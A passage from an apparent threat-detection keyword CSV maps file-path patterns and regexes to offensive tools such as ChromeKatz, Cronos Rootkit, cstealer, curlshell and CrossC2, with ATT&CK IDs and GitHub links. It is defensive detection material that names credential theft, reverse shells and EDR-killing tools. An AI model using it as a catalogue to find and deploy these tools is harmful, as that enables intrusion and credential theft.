Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*\ConfuserEx\*",".{0,1000}\\ConfuserEx\\.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*\ConfuserEx\Obfuscated.exe*",".{0,1000}\\ConfuserEx\\Obfuscated\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\ConfuserEx_bin.zip*",".{0,1000}\\ConfuserEx_bin\.zip.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*\Convert-ROT47.ps1*",".{0,1000}\\Convert\-ROT47\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\CookieData.txt --all*",".{0,1000}\\CookieData\.txt\s\-\-all.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\CookieHijack.ps1*",".{0,1000}\\CookieHijack\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\CookieKatz.vcxproj*",".{0,1000}\\CookieKatz\.vcxproj.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*\CookieKatz-BOF\*",".{0,1000}\\CookieKatz\-BOF\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*\CookieKatzMinidump\*",".{0,1000}\\CookieKatzMinidump\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*\Cooolis-ms-Loader\*",".{0,1000}\\Cooolis\-ms\-Loader\\.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*\CopyItemCommand.cs",".{0,1000}\\CopyItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Copy-VSS.ps1*",".{0,1000}\\Copy\-VSS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\crackmapexecwin*",".{0,1000}\\crackmapexecwin.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\cradle.ps1*",".{0,1000}\\cradle\.ps1.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*\cradle.ps1*",".{0,1000}\\cradle\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Crassus-main*",".{0,1000}\\Crassus\-main.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*\Create-HotKeyLNK.ps1*",".{0,1000}\\Create\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Create-MultipleSessions.ps1*",".{0,1000}\\Create\-MultipleSessions\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\credentials.log*",".{0,1000}\\credentials\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\creditcards.py*",".{0,1000}\\creditcards\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\credmaster.py*",".{0,1000}\\credmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\CredMaster-master.zip*",".{0,1000}\\CredMaster\-master\.zip.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\credmaster-success.txt*",".{0,1000}\\credmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\credmaster-validusers.txt*",".{0,1000}\\credmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\CredsPhish.log*",".{0,1000}\\CredsPhish\.log.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\Cronos Rootkit.sln*",".{0,1000}\\Cronos\sRootkit\.sln.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\Cronos Rootkit\*",".{0,1000}\\Cronos\sRootkit\\.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\CronosDebugger.vcxproj*",".{0,1000}\\CronosDebugger\.vcxproj.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\Cronos-x64.zip*",".{0,1000}\\Cronos\-x64\.zip.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\CrossC2.*",".{0,1000}\\CrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*\CROSSNET\CROSSNET\*",".{0,1000}\\CROSSNET\\CROSSNET\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","0","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*\cryptolok*",".{0,1000}\\cryptolok.{0,1000}","offensive_tool_keyword","Github Username","redteam tools github repo ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/cryptolok","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\CScrandle_fileless.cs*",".{0,1000}\\CScrandle_fileless\.cs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\CsOnTheFly.ps1*",".{0,1000}\\CsOnTheFly\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\cstealer.py*",".{0,1000}\\cstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*\ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1897","287","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z" "*\CultesDesGoules.txt*",".{0,1000}\\CultesDesGoules\.txt.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\curlshell.py*",".{0,1000}\\curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*\curlshell-main*",".{0,1000}\\curlshell\-main.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*\curlshell-main\*",".{0,1000}\\curlshell\-main\\.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*\CurrentVersion\Run\XenoUpdateManager*",".{0,1000}\\CurrentVersion\\Run\\XenoUpdateManager.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\CustomEncoding.cpp*",".{0,1000}\\CustomEncoding\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\D1rkInject\*",".{0,1000}\\D1rkInject\\.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*\dacledit-*.bak*",".{0,1000}\\dacledit\-.{0,1000}\.bak.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\dacledit.py*",".{0,1000}\\dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\daclread.py*",".{0,1000}\\daclread\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\dangerousACL_Computer.txt*",".{0,1000}\\dangerousACL_Computer\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\dangerousACL_Groups.txt*",".{0,1000}\\dangerousACL_Groups\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\darkexe.py*",".{0,1000}\\darkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*\DarkLoadLibrary.*",".{0,1000}\\DarkLoadLibrary\..{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","0","N/A","10","10","990","199","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*\Darkside.exe*",".{0,1000}\\Darkside\.exe.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*\Darkside.sln*",".{0,1000}\\Darkside\.sln.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*\DarkWidow\src\*",".{0,1000}\\DarkWidow\\src\\.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*\dashlane\getCredsdashlaneEntries.h*",".{0,1000}\\dashlane\\getCredsdashlaneEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" 